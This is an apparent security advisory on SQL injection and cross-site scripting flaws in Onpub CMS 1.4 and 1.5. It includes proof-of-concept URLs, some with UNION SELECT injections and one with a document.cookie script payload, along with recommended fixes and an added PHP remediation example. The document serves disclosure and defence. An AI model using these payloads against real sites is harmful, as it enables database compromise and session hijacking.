Document Title:
===============
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1120


Release Date:
=============
2013-10-26


Vulnerability Laboratory ID (VL-ID):
====================================
1120


Common Vulnerability Scoring System:
====================================
8.2

Product & Service Introduction:
===============================
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub's default
design and functionality via open-standard web development tools and techniques.

Onpub is ideal for those with no desire to implement a CMS from scratch, but who still need a custom, yet agile solution.
Onpub tightly integrates many widely used third-party web apps and scripts into one coherent system to build further upon.

( Copy of the Vendor Homepage: http://onpub.com/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical

Technical Details & Description:
================================
1.1
Multiple remote SQL injection web vulnerabilities have been detected in the official Onpub v1.4 and v1.5 Content Management System web application.
The vulnerabilities allow remote attackers to inject their own SQL commands without authorization and compromise the web application or the web server's DBMS.

The SQL injection vulnerabilities are located in the `websiteID`, `imageID`, `keywords`, `orderBy`, `order` and `articleID` values of the index.php file.
Remote attackers are able to inject their own SQL commands via GET method requests to compromise the database management system or the CMS web application.
The injection can be performed through the manage path via a GET method request, or through the `articleID` parameter of the index.php file via a POST method request.
The severity of the remote SQL injection bugs is estimated as critical.

Exploitation of the remote SQL injection web vulnerabilities requires no user interaction and no privileged web application user account.
Successful exploitation of the remote SQL injection bugs results in compromise of the database management system and of the CMS or web application.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID



2.1
A client-side POST injection web vulnerability has been detected in the official Onpub v1.4 and v1.5 Content Management System web application.
The vulnerability allows remote attackers to manipulate web application to browser requests (client-side) via the POST method.

The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
Remote attackers can manipulate the `page` parameter of the `index.php` file via a GET method request to compromise the client-side application context.

Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
client-side unauthorized external redirects and client-side manipulation of the contact form module context.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page


Proof of Concept (PoC):
=======================
1.1
The SQL injection web vulnerabilities can be exploited by remote attackers without a privileged application user account and without user interaction.
For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]


onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--



2.1
The client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged application user account
and with low user interaction (a click). For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>


Solution - Fix & Patch:
=======================
1.1
Parse the vulnerable `websiteID`, `imageID`, `keywords`, `articleID`, `orderBy` and `order` parameters in the index.php file.
Use mysql_real_escape_string() or, preferably, a prepared statement to prevent SQL injection attacks.

2.1
Parse or encode the vulnerable `page` parameter in the index.php file to prevent client-side cross site scripting attacks.


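As an added example that is not part of the original advisory or of Onpub's own code, the following PHP (PHP 7 syntax) shows one way to apply the fixes recommended above for both the SQL injection (1.1) and the cross site scripting (2.1) issues in a single index.php handler. The table and column names, the database credentials and the HTML markup are assumptions; only the parameter names come from the advisory, and note that `orderBy` and `order` end up in the ORDER BY clause, where neither escaping nor a bound parameter helps, so they are checked against an allow-list instead.

```php
<?php
// Added example, not Onpub's own code. Table/column names, credentials and
// markup below are assumptions; only the parameter names come from the advisory.

// 1. websiteID / imageID / articleID are numeric identifiers: cast to int so
//    no quote, space or keyword from the request survives into the query
//    (covers the "websiteID=-1 union select ..." and "articleID=1 ..." cases).
$websiteID = (int) ($_GET['websiteID'] ?? 0);
$imageID   = (int) ($_GET['imageID'] ?? 0);
$articleID = (int) ($_POST['articleID'] ?? $_GET['articleID'] ?? 0);

// 2. orderBy / order become part of the ORDER BY clause. A column name and a
//    sort direction cannot be bound as prepared-statement parameters, and
//    mysql_real_escape_string() does not help either because no quotes are
//    involved, so both are validated against an allow-list and the request
//    value is only used when it matches exactly.
$allowedColumns = ['ID', 'title', 'created', 'modified']; // assumed column names
$orderBy = in_array($_GET['orderBy'] ?? '', $allowedColumns, true)
    ? $_GET['orderBy'] : 'ID';
$order = (strtoupper($_GET['order'] ?? 'ASC') === 'DESC') ? 'DESC' : 'ASC';

// 3. keywords is free text, so it is bound as a parameter. The DBMS then
//    treats the whole value as one string literal, quotes included.
$mysqli   = new mysqli('localhost', 'user', 'pass', 'onpub'); // assumed credentials
$keywords = '%' . ($_GET['keywords'] ?? '') . '%';
$stmt = $mysqli->prepare(
    "SELECT ID, title FROM OnpubArticles WHERE title LIKE ? ORDER BY $orderBy $order"
);
$stmt->bind_param('s', $keywords);
$stmt->execute();
$stmt->bind_result($id, $title);
while ($stmt->fetch()) {
    // 4. Every database value reflected into HTML is encoded on output, so a
    //    title containing <, >, " or ' can no longer break out of the markup.
    echo '<li>' . htmlspecialchars($title, ENT_QUOTES, 'UTF-8') . '</li>';
}
$stmt->close();

// 5. page (the XSS parameter in 2.1) only ever means a page number, so it is
//    cast to int as well and encoded when written back into the link.
$page = (int) ($_GET['page'] ?? 1);
echo '<a href="index.php?onpub=EditImages&amp;page='
   . htmlspecialchars((string) $page, ENT_QUOTES, 'UTF-8') . '">Next</a>';
```

A bound `keywords` value can still contain the LIKE wildcards `%` and `_`, which changes what is matched but cannot change the structure of the query.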
Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerabilities is estimated as critical.

1.2
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]


--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com